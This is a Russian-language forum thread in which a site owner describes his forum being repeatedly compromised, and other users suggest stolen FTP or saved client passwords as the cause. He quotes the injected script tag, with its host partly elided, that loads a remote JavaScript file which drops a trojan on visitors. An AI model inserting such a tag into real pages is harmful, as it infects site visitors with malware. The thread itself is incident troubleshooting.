Перейти к контенту
  • 0

подскажите, каким образом хакнули форум?


Вопрос

симптомы:

в файл index.php вставлена строка

<script src='httр://....../forums/lofi/lofipict/Asc.js'></script>

сам js-скрипт содержит вызов exe-трояна у клиента.

 

Какой-то x#й закачивает постоянно на мой форум папку /lofipict, в которой лежат трояны (php и exe-файлы), которые собирают какие-то socks4 и socks5 сервера, и ещё бесцеремонно в моей базе данных mysql складывют свою статистику.

По apache-логам вообще непонятно как он заливает эти файлы.

Но я нашел в каталоге /lang/en/lang_pref.php <- скрипт удаленного администрирования.

Как он вообще туда смог залить этот php?

 

Первый день я просто грохнул эти файлы, сегодня они опять появились.

Как он это делает? :D

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0
Как он это делает?

Через админку например.

 

Админка закрыта на Basic Auth.

 

FTP логи хостером не ведутся.

 

Беда, третий раз подряд заливает всякое барахло. Причем каждый раз разный набор "утилит"...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Беда, третий раз подряд заливает всякое барахло. Причем каждый раз разный набор "утилит"...

Смени пароль ФТР. Последнее время участились кражи паролей.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

rocket1

хреново что фтп логи не ведутся хостером

в админку они заходили или нет?

прошерсти файлы и базу на предмет левака

FatCat

угу например те что в TotalComander сохраняются

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.